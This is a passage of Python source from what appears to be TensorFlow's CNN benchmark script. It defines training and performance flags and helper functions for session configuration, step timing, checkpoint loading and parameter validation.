GPUs share the same threadpool.') flags.DEFINE_integer('per_gpu_thread_count', 0, 'The number of threads to use for GPU. Only valid when ' 'gpu_thread_mode is not global.') flags.DEFINE_boolean('hierarchical_copy', False, 'Use hierarchical copies. Currently only optimized for ' 'use on a DGX-1 with 8 GPUs and may perform poorly on ' 'other hardware. Requires --num_gpus > 1, and only ' 'recommended when --num_gpus=8') # TODO(hinsu): Support auto-detection of the network topology while still # retaining the ability to specify a particular topology for debugging. flags.DEFINE_enum( 'network_topology', constants.NetworkTopology.DGX1, (constants.NetworkTopology.DGX1, constants.NetworkTopology.GCP_V100), 'Network topology specifies the topology used to connect multiple devices. 
' 'Network topology is used to decide the hierarchy to use for the ' 'hierarchical_copy.') flags.DEFINE_integer('gradient_repacking', 0, 'Use gradient repacking. It' 'currently only works with replicated mode. At the end of' 'of each step, it repacks the gradients for more efficient' 'cross-device transportation. A non-zero value specifies' 'the number of split packs that will be formed.', lower_bound=0) flags.DEFINE_boolean('compact_gradient_transfer', True, 'Compact gradient' 'as much as possible for cross-device transfer and ' 'aggregation.') flags.DEFINE_enum('variable_consistency', 'strong', ('strong', 'relaxed'), 'The data consistency for trainable variables. With strong ' 'consistency, the variable always have the updates from ' 'previous step. With relaxed consistency, all the updates ' 'will eventually show up in the variables. Likely one step ' 'behind.') flags.DEFINE_boolean('datasets_repeat_cached_sample', False, 'Enable use of a special datasets pipeline that reads a ' 'single TFRecord into memory and repeats it infinitely ' 'many times. The purpose of this flag is to make it ' 'possible to write regression tests that are not ' 'bottlenecked by CNS throughput. ' 'Use datasets_use_caching to cache input data.') flags.DEFINE_enum('local_parameter_device', 'gpu', ('cpu', 'gpu', 'CPU', 'GPU'), 'Device to use as parameter server: cpu or gpu. For ' 'distributed training, it can affect where caching of ' 'variables happens.') flags.DEFINE_enum('device', 'gpu', ('cpu', 'gpu', 'CPU', 'GPU'), 'Device to use for computation: cpu or gpu') flags.DEFINE_enum('data_format', 'NCHW', ('NHWC', 'NCHW'), 'Data layout to use: NHWC (TF native) or NCHW (cuDNN ' 'native, requires GPU).') flags.DEFINE_integer('num_intra_threads', None, 'Number of threads to use for intra-op parallelism. If ' 'set to 0, the system will pick an appropriate number.') flags.DEFINE_integer('num_inter_threads', 0, 'Number of threads to use for inter-op parallelism. If ' 'set to 0, the system will pick an appropriate number.') flags.DEFINE_string('trace_file', '', 'Enable TensorFlow tracing and write trace to this file.') flags.DEFINE_boolean('use_chrome_trace_format', True, 'If True, the trace_file, if specified, will be in a ' 'Chrome trace format. If False, then it will be a ' 'StepStats raw proto.') _NUM_STEPS_TO_PROFILE = 10 _NUM_OPS_TO_PRINT = 20 flags.DEFINE_string('tfprof_file', None, 'If specified, write a tfprof ProfileProto to this file. ' 'The performance and other aspects of the model can then ' 'be analyzed with tfprof. See ' 'https://github.com/tensorflow/tensorflow/blob/master/tensorflow/core/profiler/g3doc/command_line.md ' # pylint: disable=line-too-long 'for more info on how to do this. The first %d steps ' 'are profiled. Additionally, the top %d most time ' 'consuming ops will be printed.\n' 'Note: profiling with tfprof is very slow, but most of the ' 'overhead is spent between steps. So, profiling results ' 'are more accurate than the slowdown would suggest.' % (_NUM_STEPS_TO_PROFILE, _NUM_OPS_TO_PRINT)) flags.DEFINE_string('graph_file', None, 'Write the model\'s graph definition to this file. 
' 'Defaults to binary format unless filename ends in "txt".') flags.DEFINE_string('partitioned_graph_file_prefix', None, 'If specified, after the graph has been partitioned and ' 'optimized, write out each partitioned graph to a file ' 'with the given prefix.') flags.DEFINE_enum('optimizer', 'sgd', ('momentum', 'sgd', 'rmsprop', 'adam'), 'Optimizer to use') flags.DEFINE_float('init_learning_rate', None, 'Initial learning rate for training.') flags.DEFINE_string('piecewise_learning_rate_schedule', None, 'Specifies a piecewise learning rate schedule based on the ' 'number of epochs. This is the form LR0;E1;LR1;...;En;LRn, ' 'where each LRi is a learning rate and each Ei is an epoch ' 'indexed from 0. The learning rate is LRi if the ' 'E(i-1) <= current_epoch < Ei. For example, if this ' 'paramater is 0.3;10;0.2;25;0.1, the learning rate is 0.3 ' 'for the first 10 epochs, then is 0.2 for the next 15 ' 'epochs, then is 0.1 until training ends.') flags.DEFINE_float('num_epochs_per_decay', 0, 'Steps after which learning rate decays. If 0, the learning ' 'rate does not decay.') flags.DEFINE_float('learning_rate_decay_factor', 0, 'Learning rate decay factor. Decay by this factor every ' '`num_epochs_per_decay` epochs. If 0, learning rate does ' 'not decay.') flags.DEFINE_float('num_learning_rate_warmup_epochs', 0, 'Slowly increase to the initial learning rate in the first ' 'num_learning_rate_warmup_epochs linearly.') flags.DEFINE_float('minimum_learning_rate', 0, 'The minimum learning rate. The learning rate will ' 'never decay past this value. Requires `learning_rate`, ' '`num_epochs_per_decay` and `learning_rate_decay_factor` to ' 'be set.') flags.DEFINE_float('resnet_base_lr', None, "Base learning rate at bs=256. Only " "relevant when training ResNet and utilizing the model's " "learning rate heuristic (get_learning_rate).") flags.DEFINE_float('momentum', 0.9, 'Momentum for training.') flags.DEFINE_float('rmsprop_decay', 0.9, 'Decay term for RMSProp.') flags.DEFINE_float('rmsprop_momentum', 0.9, 'Momentum in RMSProp.') flags.DEFINE_float('rmsprop_epsilon', 1.0, 'Epsilon term for RMSProp.') flags.DEFINE_float('adam_beta1', 0.9, 'Beta2 term for the Adam optimizer') flags.DEFINE_float('adam_beta2', 0.999, 'Beta2 term for the Adam optimizer') flags.DEFINE_float('adam_epsilon', 1e-8, 'Epsilon term for the Adam optimizer') flags.DEFINE_float('gradient_clip', None, 'Gradient clipping magnitude. Disabled by default.') flags.DEFINE_float('weight_decay', 0.00004, 'Weight decay factor for training.') flags.DEFINE_float('gpu_memory_frac_for_testing', 0, 'If non-zero, the fraction of GPU memory that will be used. ' 'Useful for testing the benchmark script, as this allows ' 'distributed mode to be run on a single machine. For ' 'example, if there are two tasks, each can be allocated ' '~40 percent of the memory on a single machine', lower_bound=0., upper_bound=1.) flags.DEFINE_boolean('use_unified_memory', False, 'If True, allocate unified memory enabling larger models ' 'to fit in available device RAM.') flags.DEFINE_boolean('use_tf_layers', True, 'If True, use tf.layers for neural network layers. This ' 'should not affect performance or accuracy in any way.') flags.DEFINE_integer('tf_random_seed', 1234, 'The TensorFlow random seed. Useful for debugging NaNs, ' 'as this can be set to various values to see if the NaNs ' 'depend on the seed.') flags.DEFINE_string('debugger', None, 'If set, use the TensorFlow debugger. If set to "cli", use ' 'the local CLI debugger. 
Otherwise, this must be in the ' 'form hostname:port (e.g., localhost:7007) in which case ' 'the experimental TensorBoard debugger will be used') flags.DEFINE_boolean('use_python32_barrier', False, 'When on, use threading.Barrier at Python 3.2.') flags.DEFINE_boolean('ml_perf', False, 'When True, change how the Imagenet input pipeline works ' 'slightly to meet the MLPerf compliance rules. This slows ' 'down the input pipeline. Without this option, at the end ' 'of the input pipeline, the image is divided by 127.5, ' 'then 1.0 is subtracted from it, bringing the image ' 'values from [0, 255] to [-1.0, 1.0]. With this option, ' 'each of the three channels (red, green, blue) have the ' 'average channel value among all image subtracted from ' 'it, and no division is done.') flags.DEFINE_boolean('datasets_use_prefetch', True, 'Enable use of prefetched datasets for input pipeline. ' 'This option is meaningless if use_datasets=False.') flags.DEFINE_integer('datasets_prefetch_buffer_size', 1, 'Prefetching op buffer size per compute device.') flags.DEFINE_integer('datasets_num_private_threads', None, 'Number of threads for a private threadpool created for ' 'all datasets computation. By default, we pick an ' 'appropriate number. If set to 0, we use the default ' 'tf-Compute threads for dataset operations.') flags.DEFINE_boolean('datasets_use_caching', False, 'Cache the compressed input data in memory. This improves ' 'the data input performance, at the cost of additional ' 'memory.') flags.DEFINE_integer('datasets_parallel_interleave_cycle_length', None, 'Number of parallel file readers interleaving input data.') flags.DEFINE_boolean('datasets_sloppy_parallel_interleave', False, 'Allow parallel interleave to depart from deterministic ' 'ordering, by temporarily skipping over files whose ' 'elements are not readily available. This can increase ' 'througput in particular in the presence of stragglers.') flags.DEFINE_integer('datasets_parallel_interleave_prefetch', None, 'The number of input elements to fetch before they are ' 'needed for interleaving.') flags.DEFINE_float('max_duration', None, 'The maximum training duration in minutes') flags.DEFINE_boolean( 'use_multi_device_iterator', True, 'If true, we use the MultiDeviceIterator for prefetching, ' 'which deterministically prefetches the data onto the ' 'various GPUs') flags.DEFINE_integer( 'multi_device_iterator_max_buffer_size', 1, 'Configuration parameter for the MultiDeviceIterator that ' ' specifies the host side buffer size for each device.') # Performance tuning parameters. flags.DEFINE_boolean('winograd_nonfused', True, 'Enable/disable using the Winograd non-fused algorithms.') flags.DEFINE_boolean( 'batchnorm_persistent', True, 'Enable/disable using the CUDNN_BATCHNORM_SPATIAL_PERSISTENT ' 'mode for batchnorm.') flags.DEFINE_boolean('sync_on_finish', False, 'Enable/disable whether the devices are synced after each ' 'step.') flags.DEFINE_boolean('staged_vars', False, 'whether the variables are staged from the main ' 'computation') flags.DEFINE_boolean('force_gpu_compatible', False, 'whether to enable force_gpu_compatible in GPU_Options') flags.DEFINE_boolean('allow_growth', None, 'whether to enable allow_growth in GPU_Options') flags.DEFINE_boolean('xla', False, 'whether to enable XLA auto-jit compilation') flags.DEFINE_boolean('xla_compile', False, 'Enable xla to compile the graph. 
Uncompilable ops will ' 'result in fatal errors.') flags.DEFINE_boolean('fuse_decode_and_crop', True, 'Fuse decode_and_crop for image preprocessing.') flags.DEFINE_boolean('distort_color_in_yiq', True, 'Distort color of input images in YIQ space.') flags.DEFINE_boolean('enable_optimizations', True, 'Whether to enable grappler and other optimizations.') flags.DEFINE_string('rewriter_config', None, 'Config for graph optimizers, described as a ' 'RewriterConfig proto buffer.') flags.DEFINE_enum('loss_type_to_report', 'total_loss', ('base_loss', 'total_loss'), 'Which type of loss to output and to write summaries for. ' 'The total loss includes L2 loss while the base loss does ' 'not. Note that the total loss is always used while ' 'computing gradients during training if weight_decay > 0, ' 'but explicitly computing the total loss, instead of just ' 'computing its gradients, can have a performance impact.') flags.DEFINE_boolean('single_l2_loss_op', False, 'If True, instead of using an L2 loss op per variable, ' 'concatenate the variables into a single tensor and do a ' 'single L2 loss on the concatenated tensor.') flags.DEFINE_boolean('use_resource_vars', False, 'Use resource variables instead of normal variables. ' 'Resource variables are slower, but this option is useful ' 'for debugging their performance.') flags.DEFINE_boolean('compute_lr_on_cpu', False, 'If True, do computations related to learning rate on the ' 'CPU instead of the GPU. This will significantly improve ' 'XLA performance in some cases.') flags.DEFINE_boolean('sparse_to_dense_grads', False, 'If True, convert all sparse gradients to dense gradients ' 'before passing them to the optimizer to update ' 'variables. Only affects models with sparse gradients, ' 'which currently is only the NCF model.') # Performance tuning specific to MKL. flags.DEFINE_boolean('mkl', False, 'If true, set MKL environment variables.') flags.DEFINE_integer('kmp_blocktime', 0, 'The time, in milliseconds, that a thread should wait, ' 'after completing the execution of a parallel region, ' 'before sleeping') flags.DEFINE_string('kmp_affinity', 'granularity=fine,verbose,compact,1,0', 'Restricts execution of certain threads (virtual execution ' 'units) to a subset of the physical processing units in a ' 'multiprocessor computer.') flags.DEFINE_integer('kmp_settings', 1, 'If set to 1, MKL settings will be printed.') # fp16 parameters. If use_fp16=False, no other fp16 parameters apply. flags.DEFINE_boolean('use_fp16', False, 'Use 16-bit floats for certain tensors instead of 32-bit ' 'floats. This is currently experimental.') # TODO(reedwm): The default loss scale of 128 causes most models to diverge # on the second step with synthetic data. Changing the tf.set_random_seed # call to tf.set_random_seed(1235) or most other seed values causes the # issue not to occur. flags.DEFINE_float('fp16_loss_scale', None, 'If fp16 is enabled, the loss is multiplied by this amount ' 'right before gradients are computed, then each gradient ' 'is divided by this amount. Mathematically, this has no ' 'effect, but it helps avoid fp16 underflow. Set to 1 to ' 'effectively disable. Ignored during eval.') flags.DEFINE_boolean('fp16_vars', False, 'If fp16 is enabled, also use fp16 for variables. If ' 'False, the variables are stored in fp32 and casted to ' 'fp16 when retrieved. 
Recommended to leave as False.') flags.DEFINE_boolean('fp16_enable_auto_loss_scale', False, 'If True and use_fp16 is True, automatically adjust the ' 'loss scale during training.') flags.DEFINE_integer('fp16_inc_loss_scale_every_n', 1000, 'If fp16 is enabled and fp16_enable_auto_loss_scale is ' 'True, increase the loss scale every n steps.') # The method for managing variables: # parameter_server: variables are stored on a parameter server that holds # the master copy of the variable. In local execution, a local device # acts as the parameter server for each variable; in distributed # execution, the parameter servers are separate processes in the # cluster. # For each step, each tower gets a copy of the variables from the # parameter server, and sends its gradients to the param server. # replicated: each GPU has its own copy of the variables. To apply # gradients, an all_reduce algorithm or or regular cross-device # aggregation is used to replicate the combined gradients to all # towers (depending on all_reduce_spec parameter setting). # independent: each GPU has its own copy of the variables, and gradients # are not shared between towers. This can be used to check performance # when no data is moved between GPUs. # distributed_replicated: Distributed training only. Each GPU has a copy # of the variables, and updates its copy after the parameter servers # are all updated with the gradients from all servers. Only works with # cross_replica_sync=true. Unlike 'replicated', currently never uses # nccl all-reduce for replicating within a server. # distributed_all_reduce: Distributed training where all replicas run # in a single session, using all-reduce to mutally reduce the # gradients. Uses no parameter servers. When there is only one # worker, this is the same as replicated. # collective_all_reduce: Distributed training where all replicas run # independepently except for variable initialization and for # gradient reduction which is done via collective all-reduce. # NOTE: collective_all_reduce in conjunction with use_fp16 can # lead to NaNs in some models (resnet50). TODO(tucker): fix it. # horovod: Distributed training using Horovod library. Runs workers using # an MPI framework (e.g. Open MPI). Each worker runs training on # single GPU, and averages gradients using NCCL or MPI all-reduce. # See https://github.com/uber/horovod for more details. flags.DEFINE_enum('variable_update', 'parameter_server', ('parameter_server', 'replicated', 'distributed_replicated', 'independent', 'distributed_all_reduce', 'collective_all_reduce', 'horovod'), 'The method for managing variables: parameter_server, ' 'replicated, distributed_replicated, independent, ' 'distributed_all_reduce, collective_all_reduce, horovod') flags.DEFINE_string('all_reduce_spec', None, 'A specification of the all_reduce algorithm to be used ' 'for reducing gradients. For more details, see ' 'parse_all_reduce_spec in variable_mgr.py. An ' 'all_reduce_spec has BNF form:\n' 'int ::= positive whole number\n' 'g_int ::= int[KkMGT]?\n' 'alg_spec ::= alg | alg#int\n' 'range_spec ::= alg_spec | alg_spec/alg_spec\n' 'spec ::= range_spec | range_spec:g_int:range_spec\n' 'NOTE: not all syntactically correct constructs are ' 'supported.\n\n' 'Examples:\n ' '"xring" == use one global ring reduction for all ' 'tensors\n' '"pscpu" == use CPU at worker 0 to reduce all tensors\n' '"nccl" == use NCCL to locally reduce all tensors. 
' 'Limited to 1 worker.\n' '"nccl/xring" == locally (to one worker) reduce values ' 'using NCCL then ring reduce across workers.\n' '"pscpu:32k:xring" == use pscpu algorithm for tensors of ' 'size up to 32kB, then xring for larger tensors.') # If variable_update==distributed_all_reduce then it may be advantageous # to aggregate small tensors into one prior to reduction. These parameters # control that aggregation. flags.DEFINE_integer('agg_small_grads_max_bytes', 0, 'If > 0, try to aggregate tensors of less than this ' 'number of bytes prior to all-reduce.') flags.DEFINE_integer('agg_small_grads_max_group', 10, 'When aggregating small tensors for all-reduce do not ' 'aggregate more than this many into one new tensor.') flags.DEFINE_integer('allreduce_merge_scope', 1, 'Establish a name scope around this many ' 'gradients prior to creating the all-reduce operations. ' 'It may affect the ability of the backend to merge ' 'parallel ops.') # Distributed training parameters. flags.DEFINE_enum('job_name', '', ('ps', 'worker', 'controller', ''), 'One of "ps", "worker", "controller", "". Empty for local ' 'training') flags.DEFINE_string('ps_hosts', '', 'Comma-separated list of target hosts') flags.DEFINE_string('worker_hosts', '', 'Comma-separated list of target hosts') flags.DEFINE_string('controller_host', None, 'optional controller host') flags.DEFINE_integer('task_index', 0, 'Index of task within the job') flags.DEFINE_string('server_protocol', 'grpc', 'protocol for servers') flags.DEFINE_boolean('cross_replica_sync', True, '') flags.DEFINE_string('horovod_device', '', 'Device to do Horovod all-reduce on: ' 'empty (default), cpu or gpu. Default with utilize GPU if ' 'Horovod was compiled with the HOROVOD_GPU_ALLREDUCE ' 'option, and CPU otherwise.') # Summary and Save & load checkpoints. flags.DEFINE_integer('summary_verbosity', 0, 'Verbosity level for summary ops. ' 'level 0: disable any summary.\n' 'level 1: small and fast ops, e.g.: learning_rate, ' 'total_loss.\n' 'level 2: medium-cost ops, e.g. histogram of all ' 'gradients.\n' 'level 3: expensive ops: images and histogram of each ' 'gradient.\n') flags.DEFINE_integer('save_summaries_steps', 0, 'How often to save summaries for trained models. Pass 0 ' 'to disable summaries.') flags.DEFINE_integer('save_model_secs', 0, 'How often to save trained models. Pass 0 to disable ' 'saving checkpoints every N seconds. A checkpoint is ' 'saved after training completes regardless of this ' 'option.') flags.DEFINE_integer('save_model_steps', None, 'How often to save trained models. If specified, ' 'save_model_secs must not be specified.') flags.DEFINE_integer('max_ckpts_to_keep', 5, 'Max number of checkpoints to keep.') flags.DEFINE_string('train_dir', None, 'Path to session checkpoints. Pass None to disable saving ' 'checkpoint at the end.') flags.DEFINE_string('eval_dir', '/tmp/tf_cnn_benchmarks/eval', 'Directory where to write eval event logs.') flags.DEFINE_string('backbone_model_path', None, 'Path to pretrained backbone model checkpoint. 
Pass None ' 'if not using a backbone model.') flags.DEFINE_enum('trt_mode', '', ['', 'FP32', 'FP16', 'INT8'], 'If this is specified in forward_only mode and ' 'freeze_when_forward_only is set to True, use TensorRT to ' 'optimize the graph before execution.') flags.DEFINE_integer('trt_max_workspace_size_bytes', 4 << 30, 'Max workspace size bytes used by the TensorRT optimizer.') # Benchmark logging for model garden metric flags.DEFINE_string('benchmark_log_dir', None, 'The directory to place the log files containing the ' 'results of benchmark. The logs are created by ' 'BenchmarkFileLogger. Requires the root of the Tensorflow ' 'models repository to be in $PYTHTONPATH.') flags.DEFINE_string('benchmark_test_id', None, 'The unique test ID of the benchmark run. It could be the ' 'combination of key parameters. It is hardware independent ' 'and could be used compare the performance between ' 'different test runs. This flag is designed for human ' 'consumption, and does not have any impact within the ' 'system.') platforms_util.define_platform_params() class GlobalStepWatcher(threading.Thread): """A helper class for global_step. Polls for changes in the global_step of the model, and finishes when the number of steps for the global run are done. """ def __init__(self, sess, global_step_op, start_at_global_step, end_at_global_step): threading.Thread.__init__(self) self.sess = sess self.global_step_op = global_step_op self.start_at_global_step = start_at_global_step self.end_at_global_step = end_at_global_step self.start_time = 0 self.start_step = 0 self.finish_time = 0 self.finish_step = 0 def run(self): while self.finish_time == 0: time.sleep(.25) global_step_val, = self.sess.run([self.global_step_op]) if self.start_time == 0 and global_step_val >= self.start_at_global_step: # Use tf.logging.info instead of log_fn, since print (which is log_fn) # is not thread safe and may interleave the outputs from two parallel # calls to print, which can break tests. tf.logging.info('Starting real work at step %s at time %s' % (global_step_val, time.ctime())) self.start_time = time.time() self.start_step = global_step_val if self.finish_time == 0 and global_step_val >= self.end_at_global_step: tf.logging.info('Finishing real work at step %s at time %s' % (global_step_val, time.ctime())) self.finish_time = time.time() self.finish_step = global_step_val def done(self): return self.finish_time > 0 def num_steps(self): return self.finish_step - self.start_step def elapsed_time(self): return self.finish_time - self.start_time class CheckpointNotFoundException(Exception): pass def create_config_proto(params): """Returns session config proto. Args: params: Params tuple, typically created by make_params or make_params_from_flags. 
""" config = tf.ConfigProto() config.allow_soft_placement = True if params.num_intra_threads is None: if params.device == 'gpu': config.intra_op_parallelism_threads = 1 else: config.intra_op_parallelism_threads = params.num_intra_threads config.inter_op_parallelism_threads = params.num_inter_threads config.experimental.collective_group_leader = '/job:worker/replica:0/task:0' config.gpu_options.force_gpu_compatible = params.force_gpu_compatible if params.allow_growth is not None: config.gpu_options.allow_growth = params.allow_growth if params.gpu_memory_frac_for_testing > 0: config.gpu_options.per_process_gpu_memory_fraction = ( params.gpu_memory_frac_for_testing) if params.use_unified_memory: config.gpu_options.experimental.use_unified_memory = True if params.xla: config.graph_options.optimizer_options.global_jit_level = ( tf.OptimizerOptions.ON_1) # TODO(b/117324590): Re-enable PinToHostOptimizer when b/117324590 is fixed. # Currently we have to disable PinToHostOptimizer w/ XLA since it causes # OOM/perf cliffs. config.graph_options.rewrite_options.pin_to_host_optimization = ( rewriter_config_pb2.RewriterConfig.OFF) if params.rewriter_config: rewriter_config = rewriter_config_pb2.RewriterConfig() text_format.Merge(params.rewriter_config, rewriter_config) config.graph_options.rewrite_options.CopyFrom(rewriter_config) elif not params.enable_optimizations: off = rewriter_config_pb2.RewriterConfig.OFF config.graph_options.optimizer_options.opt_level = tf.OptimizerOptions.L0 rewrite_options = config.graph_options.rewrite_options rewrite_options.layout_optimizer = off rewrite_options.constant_folding = off rewrite_options.shape_optimization = off rewrite_options.remapping = off rewrite_options.arithmetic_optimization = off rewrite_options.dependency_optimization = off rewrite_options.loop_optimization = off rewrite_options.function_optimization = off rewrite_options.debug_stripper = off rewrite_options.disable_model_pruning = True rewrite_options.scoped_allocator_optimization = off rewrite_options.memory_optimization = ( rewriter_config_pb2.RewriterConfig.NO_MEM_OPT) rewrite_options.pin_to_host_optimization = off elif params.variable_update == 'collective_all_reduce': rewrite_options = config.graph_options.rewrite_options rewrite_options.scoped_allocator_optimization = ( rewriter_config_pb2.RewriterConfig.ON) rewrite_options.scoped_allocator_opts.enable_op.append('CollectiveReduce') if params.variable_update == 'horovod': import horovod.tensorflow as hvd # pylint: disable=g-import-not-at-top config.gpu_options.visible_device_list = str(hvd.local_rank()) return config def get_mode_from_params(params): """Returns the mode in which this script is running. Args: params: Params tuple, typically created by make_params or make_params_from_flags. Raises: ValueError: Unsupported params settings. """ if params.forward_only and params.eval: raise ValueError('Only one of forward_only and eval parameters is true') if params.eval: return constants.BenchmarkMode.EVAL elif params.forward_only: return constants.BenchmarkMode.FORWARD_ONLY elif (params.eval_during_training_every_n_steps or params.eval_during_training_every_n_epochs or params.eval_during_training_at_specified_steps or params.eval_during_training_at_specified_epochs): return constants.BenchmarkMode.TRAIN_AND_EVAL else: return constants.BenchmarkMode.TRAIN # How many digits to show for the loss and accuracies during training. 
LOSS_AND_ACCURACY_DIGITS_TO_SHOW = 3 def benchmark_one_step(sess, fetches, step, batch_size, step_train_times, trace_filename, partitioned_graph_file_prefix, profiler, image_producer, params, summary_op=None, show_images_per_sec=True, benchmark_logger=None, collective_graph_key=0): """Advance one step of benchmarking.""" should_profile = profiler and 0 <= step < _NUM_STEPS_TO_PROFILE need_options_and_metadata = ( should_profile or collective_graph_key > 0 or ((trace_filename or partitioned_graph_file_prefix) and step == -2) ) if need_options_and_metadata: run_options = tf.RunOptions() if (trace_filename and step == -2) or should_profile: run_options.trace_level = tf.RunOptions.FULL_TRACE if partitioned_graph_file_prefix and step == -2: run_options.output_partition_graphs = True if collective_graph_key > 0: run_options.experimental.collective_graph_key = collective_graph_key run_metadata = tf.RunMetadata() else: run_options = None run_metadata = None summary_str = None start_time = time.time() if summary_op is None: results = sess.run(fetches, options=run_options, run_metadata=run_metadata) else: (results, summary_str) = sess.run( [fetches, summary_op], options=run_options, run_metadata=run_metadata) if not params.forward_only: lossval = results['average_loss'] else: lossval = 0. if image_producer is not None: image_producer.notify_image_consumption() train_time = time.time() - start_time step_train_times.append(train_time) if (show_images_per_sec and step >= 0 and (step == 0 or (step + 1) % params.display_every == 0)): speed_mean, speed_uncertainty, speed_jitter = get_perf_timing( batch_size, step_train_times, params.display_perf_ewma) log_str = '%i\t%s\t%.*f' % ( step + 1, get_perf_timing_str(speed_mean, speed_uncertainty, speed_jitter), LOSS_AND_ACCURACY_DIGITS_TO_SHOW, lossval) if 'top_1_accuracy' in results: log_str += '\t%.*f\t%.*f' % ( LOSS_AND_ACCURACY_DIGITS_TO_SHOW, results['top_1_accuracy'], LOSS_AND_ACCURACY_DIGITS_TO_SHOW, results['top_5_accuracy']) log_fn(log_str) if benchmark_logger: benchmark_logger.log_metric( 'current_examples_per_sec', speed_mean, global_step=step + 1) if 'top_1_accuracy' in results: benchmark_logger.log_metric( 'top_1_accuracy', results['top_1_accuracy'], global_step=step + 1) benchmark_logger.log_metric( 'top_5_accuracy', results['top_5_accuracy'], global_step=step + 1) if need_options_and_metadata: if should_profile: profiler.add_step(step, run_metadata) if trace_filename and step == -2: log_fn('Dumping trace to %s' % trace_filename) trace_dir = os.path.dirname(trace_filename) if not gfile.Exists(trace_dir): gfile.MakeDirs(trace_dir) with gfile.Open(trace_filename, 'w') as trace_file: if params.use_chrome_trace_format: trace = timeline.Timeline(step_stats=run_metadata.step_stats) trace_file.write(trace.generate_chrome_trace_format(show_memory=True)) else: trace_file.write(str(run_metadata.step_stats)) if partitioned_graph_file_prefix and step == -2: path, filename = os.path.split(partitioned_graph_file_prefix) if '.' in filename: base_filename, ext = filename.rsplit('.', 1) ext = '.' 
+ ext else: base_filename, ext = filename, '' as_text = filename.endswith('txt') for graph_def in run_metadata.partition_graphs: device = graph_def.node[0].device.replace('/', '_').replace(':', '_') graph_filename = '%s%s%s' % (base_filename, device, ext) log_fn('Writing partitioned GraphDef as %s to %s' % ( 'text' if as_text else 'binary', os.path.join(path, graph_filename))) tf.train.write_graph(graph_def, path, graph_filename, as_text) return (summary_str, lossval) def get_perf_timing_str(speed_mean, speed_uncertainty, speed_jitter, scale=1): if scale == 1: # TODO(laigd): rename 'images' to maybe 'inputs', same below. return ('images/sec: %.1f +/- %.1f (jitter = %.1f)' % (speed_mean, speed_uncertainty, speed_jitter)) else: return 'images/sec: %.1f' % speed_mean def get_perf_timing(batch_size, step_train_times, ewma_alpha=None, scale=1): """Calculate benchmark processing speed.""" times = np.array(step_train_times) speeds = batch_size / times if ewma_alpha: weights = np.logspace(len(times)-1, 0, len(times), base=1-ewma_alpha) time_mean = np.average(times, weights=weights) else: time_mean = np.mean(times) speed_mean = scale * batch_size / time_mean speed_uncertainty = np.std(speeds) / np.sqrt(float(len(speeds))) speed_jitter = 1.4826 * np.median(np.abs(speeds - np.median(speeds))) return speed_mean, speed_uncertainty, speed_jitter def load_checkpoint(saver, sess, ckpt_dir): """Loads checkpoint from provided directory or full path. Args: saver: Saver used to restore the checkpoint. sess: TensorFlow session. ckpt_dir: Path to a folder of checkpoints or full path to a checkpoint. Returns: Global step. """ model_checkpoint_path = _get_checkpoint_to_load(ckpt_dir) global_step = model_checkpoint_path.split('/')[-1].split('-')[-1] if not global_step.isdigit(): global_step = 0 else: global_step = int(global_step) saver.restore(sess, model_checkpoint_path) log_fn('Successfully loaded model from %s.' % model_checkpoint_path) return global_step def _get_checkpoint_to_load(ckpt_dir): """Returns which checkpoint to load. Args: ckpt_dir: Path to a folder of checkpoints or full path to a checkpoint. Returns: Full path to checkpoint to load. Raises: CheckpointNotFoundException: If checkpoint is not found. """ p = re.compile(r'ckpt-\d+$') if p.search(ckpt_dir): model_checkpoint_path = ckpt_dir else: # Finds latest checkpoint in directory provided ckpt = tf.train.get_checkpoint_state(ckpt_dir) if ckpt and ckpt.model_checkpoint_path: model_checkpoint_path = ckpt.model_checkpoint_path else: raise CheckpointNotFoundException('No checkpoint file found in dir: {}'. format(ckpt_dir)) return model_checkpoint_path # Params are passed to BenchmarkCNN's constructor. Params is a map from name # to value, with one field per key in flags.param_specs. # # Call make_params() or make_params_from_flags() below to construct a Params # tuple with default values from flags.param_specs, rather than constructing # Params directly. Params = namedtuple('Params', flags.param_specs.keys()) # pylint: disable=invalid-name def validate_params(params): """Validates that the Params tuple has valid values. When command-line flags are defined for each ParamSpec by calling flags.define_flags(), calling this function is unnecessary because absl already does flag validation. Otherwise, this function should be called. Args: params: A Params tuple. Raises: ValueError: An element of params had an invalid value. 
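Example (illustrative; assumes the 'optimizer' spec is an enum over ('momentum', 'sgd', 'rmsprop', 'adam')): a params.optimizer value of 'adagrad' fails the enum check below and raises ValueError.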
""" for name, value in params._asdict().items(): param_spec = flags.param_specs[name] if param_spec.flag_type in ('integer', 'float'): if (value is not None and param_spec.kwargs['lower_bound'] is not None and value < param_spec.kwargs['lower_bound']): raise ValueError('Param %s value of %s is lower than the lower bound ' 'of %s' % (name, value, param_spec.kwargs['lower_bound'])) if (value is not None and param_spec.kwargs['upper_bound'] is not None and param_spec.kwargs['upper_bound'] < value): raise ValueError('Param %s value of %s is higher than the upper bound ' 'of %s' % (name, value, param_spec.kwargs['upper_bound'])) elif (value is not None and param_spec.flag_type == 'enum' and value not in param_spec.kwargs['enum_values']): raise ValueError('Param %s of value %s is not in %s'% (name, value, param_spec.kwargs['enum_values'])) def make_params(**kwargs): """Create a Params tuple for BenchmarkCNN from kwargs. Default values are filled in from flags.param_specs. Args: **kwargs: kwarg values will override the default values. Returns: Params namedtuple for constructing BenchmarkCNN. """ # Create a (name: default_value) map from flags.param_specs. default_kwargs = { name: flags.param_specs[name].default_value for name in flags.param_specs } params = Params(**default_kwargs)._replace(**kwargs) validate_params(params) return params def make_params_from_flags(): """Create a Params tuple for BenchmarkCNN from absl_flags.FLAGS. Returns: Params namedtuple for constructing BenchmarkCNN. """ # Collect (name: value) pairs for absl_flags.FLAGS with matching names in # flags.param_specs. flag_values = {name: getattr(absl_flags.FLAGS, name) for name in flags.param_specs.keys()} return Params(**flag_values) def remove_param_fields(params, fields_to_remove): """Remove fields from a Params namedtuple.""" params_dict = params._asdict() for field in fields_to_remove: assert field in params_dict, 'Invalid Params field: ' + field params_dict = {k: v for k, v in params_dict.items() if k not in fields_to_remove} new_params_type = namedtuple('Params', params_dict.keys()) return new_params_type(**params_dict) def get_num_batches_and_epochs(params, batch_size, num_examples_per_epoch): """Returns the number of batches and epochs to run for. Args: params: Params tuple, typically created by make_params or make_params_from_flags. batch_size: The number of images per step. num_examples_per_epoch: The number of images in a single epoch. Returns: num_batches: The number of batches to run for. num_epochs: The number of epochs to run for. This might be slightly smaller than params.num_epochs if specified, because the number of batches must be an integer. Raises: ValueError: Invalid or unsupported params. """ if params.num_batches and params.num_epochs: raise ValueError('At most one of --num_batches and --num_epochs may be ' 'specified.') if params.num_epochs: num_batches = 